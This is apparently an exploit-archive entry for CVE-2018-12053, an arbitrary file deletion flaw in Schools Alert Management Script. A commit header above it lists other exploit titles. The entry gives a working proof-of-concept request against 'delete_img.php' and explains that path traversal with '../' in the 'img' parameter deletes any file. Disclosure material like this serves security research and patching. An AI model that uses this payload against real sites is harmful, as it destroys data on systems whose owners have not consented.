
11 changes to exploits/shellcodes WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS WampServer 3.0.6 - Cross-Site Request Forgery Schools Alert Management Script - SQL Injection WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection Event Manager Admin panel - 'events_new.php' SQL injection Joomla! Component EkRishta 2.10 - 'cid' SQL Injection Schools Alert Management Script - Arbitrary File Deletion userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting userSpice 4.3.24 - Username Enumeration Schools Alert Management Script - 'get_sec.php' SQL Injection Schools Alert Management Script - Arbitrary File Read
15 lines
No EOL
654 B
Text
15 lines
No EOL
654 B
Text
# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion
|
||
# Date: 2018-06-07
|
||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
|
||
# Category: Web Application
|
||
# Exploit Author: M3@Pandas
|
||
# Web: https://github.com/unh3x/just4cve/issues/6
|
||
# Tested on: Linux Mint
|
||
# CVE: CVE-2018-12053
|
||
|
||
# Proof of Concept:
|
||
|
||
/delete_img.php?img=./uploads/school_logos/1528_x1.php
|
||
# notice: There is a risk of file deletion,you'd better test it combined with file upload vulnerability.
|
||
# Attackers can delete any file through parameter 'img' with '../' . |